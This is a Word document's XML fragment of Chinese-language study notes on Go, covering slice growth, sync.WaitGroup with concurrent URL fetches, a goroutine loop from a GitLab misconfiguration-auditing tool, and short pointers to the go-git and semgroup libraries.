    <w:p w14:paraId="29407538" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说，如果待拷贝数据的容量小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 512 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的话，性能不受影响。但如果超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 512 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节，就会开始切片扩容。数据量越大，扩容越频繁，性能受影响越大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DDB4D8" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果数据量足够大的话，内存可能就直接撑爆了，这样的话影响就大了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE05A9B" w14:textId="08B15D06" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174A5745" w14:textId="1A02AC5D" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739B2B65" w14:textId="77777777" w:rsidR="005E006C" w:rsidRDefault="005E006C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19841A84" w14:textId="7BF9FA3D" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4001F085" w14:textId="77777777" w:rsidR="00333BAC" w:rsidRDefault="00333BAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25881E5A" w14:textId="72013650" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338D902D" w14:textId="77777777" w:rsidR="007509F8" w:rsidRDefault="007509F8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E2A7A4" w14:textId="4C733BC4" w:rsidR="00282FF1" w:rsidRDefault="00282FF1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC8A557" w14:textId="77777777" w:rsidR="00282FF1" w:rsidRDefault="00282FF1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79847283" w14:textId="435D50EE" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="_Toc159779810"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sync</w:t>
      </w:r>
      <w:r w:rsidR="00390795">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00390795">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r w:rsidR="00390795">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的多线程</w:t>
      </w:r>
      <w:r w:rsidR="00390795">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00390795">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多协程同步</w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
    </w:p>
    <w:p w14:paraId="6DF69B57" w14:textId="28B2537D" w:rsidR="00A82886" w:rsidRDefault="00A82886" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55861537" w14:textId="77777777" w:rsidR="00A82886" w:rsidRDefault="00A82886" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WaitGroup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么以及它能为我们解决什么问题？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379F147" w14:textId="598B99A0" w:rsidR="00A82886" w:rsidRDefault="00A82886" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WaitGroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中，用于线程同步，单从字面意思理解，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待的意思，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组、团队的意思，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WaitGroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是指等待一组，等待一个系列执行完成后才会继续向下执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A751DB" w14:textId="3076D30E" w:rsidR="00A82886" w:rsidRDefault="00A82886" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9451A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goroutine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9451A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的结束过程是不可控制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9451A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我们可以保证的只有</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9451A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>main goroutine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9451A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的终</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39B80D" w14:textId="76C54C8A" w:rsidR="00A82886" w:rsidRDefault="00A82886" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时候可以借助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WaitGroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goroutine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D713E" w14:textId="77777777" w:rsidR="00A82886" w:rsidRPr="00A82886" w:rsidRDefault="00A82886" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692A020D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>sync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D8D4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var wg sync.WaitGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642C859" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0CBE19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var urls = []string{ "http://www.golang.org/", "http://www.google.com/", "http://www.somestupidname.com/", }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E58EA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9ED178" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">for _, url := range urls { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D6CDF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">wg.Add(1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A89A28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> go func(url string) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EBC10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">defer wg.Done() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF168E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> // Fetch the URL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B519359" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> http.Get(url) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E90BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> }(url) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F530FC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109127D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// Wait for all HTTP fetches to complete. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB19E06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>wg.Wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580813E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EFBEC9" w14:textId="31FB8BCC" w:rsidR="004C452C" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="355" w:name="_Toc159779811"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitmisconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r w:rsidR="003219E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="003219E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="003219E3">
        <w:t>ofunc()</w:t>
      </w:r>
      <w:r w:rsidR="003219E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
    </w:p>
    <w:p w14:paraId="2B02F246" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B15331C" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>AllProjects, projectsService, approvalService, projectMembersService, protectedBranchesService, projectAccessTokensService, projectValidateService, runnersService := ListAllProjects(gitlabClient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67567E2E" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>output.Projects.Projects = make([]types.Project, 0, len(AllProjects))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C338FB6" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3076FE43" w14:textId="611D33A0" w:rsidR="004C452C" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var wg sync.WaitGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE650E3" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for _, single_project := range AllProjects {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9FD12" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if single_project.DefaultBranch == "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E3E88" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2421BA95" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFFA212" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F9725E" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>wg.Add(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA55438" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRPr="003219E3" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go func(single_project *gitlab.Project) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F28C22" w14:textId="1CB1C85F" w:rsidR="000F1A22" w:rsidRPr="003219E3" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer wg.Done()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4EBD07" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003219E3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}(single_project)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6950A" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40807A9F" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BED055F" w14:textId="77777777" w:rsidR="000F1A22" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>wg.Wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600510A0" w14:textId="6EF3DEA8" w:rsidR="004C452C" w:rsidRDefault="000F1A22" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5BC47C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="_Toc159779812"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/go-git/go-git</w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w14:paraId="048D9447" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://github.com/go-git/go-git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="467E295B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://github.com/go-git/go-git/tree/master/_examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71055F6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762AAA7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDB9224" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc159779813"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/fatih/semgroup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
    </w:p>
    <w:p w14:paraId="4B825E59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636A4C0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">semgroup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为处理公共任务的子任务的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> goroutine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组提供同步和错误传播。它使用加权信号量实现来确保任何时候只能运行多个最大任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF4991D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
